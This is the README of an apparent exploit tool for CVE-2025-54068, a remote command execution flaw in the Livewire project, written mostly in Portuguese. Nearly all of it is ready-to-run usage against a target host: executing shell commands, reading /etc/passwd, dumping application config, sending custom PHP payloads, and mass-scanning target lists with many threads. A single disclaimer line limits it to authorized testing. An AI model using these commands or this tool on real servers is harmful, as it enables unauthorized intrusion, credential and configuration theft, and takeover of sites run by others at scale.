
A tool designed to exploit CVE-2025-54068 and Remote Command Execution of the Livewire project.
Uma ferramenta projetada para explorar CVE-2025-54068 e Execução Remota de Comandos se a APP_KEY do projeto Livewire for conhecida.
Esta ferramenta é uma versão recodificada do projeto original da Synacktiv:
O conceito central e a metodologia são baseados na implementação original. Esta versão inclui pequenas melhorias e funcionalidades adicionais para aumentar a usabilidade e flexibilidade.
Instale a ferramenta usando pipx:
pipx install git+https://github.com/haxorstars/CVE-2025-54068
ou usando uv:
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
Execute a ferramenta contra um único alvo:
livewire-rce-2025 -u target.com
Com parâmetros personalizados:
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
Execute funções personalizadas predefinidas:
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
Combine múltiplas funções em um único comando:
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
Use seu próprio arquivo de payload PHP:
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
Gere o payload sem enviá-lo ao alvo:
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
Ou usando um arquivo PHP personalizado:
livewire-rce-2025 -generate-payload --custom-file custom.php
Escaneie múltiplos alvos a partir de um arquivo:
livewire-rce-2025 -mass-check targets.txt -o results.json
Com número personalizado de threads:
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
Esta ferramenta destina-se apenas a fins educacionais e de testes de segurança autorizados. Não a utilize contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
Feliz hacking😄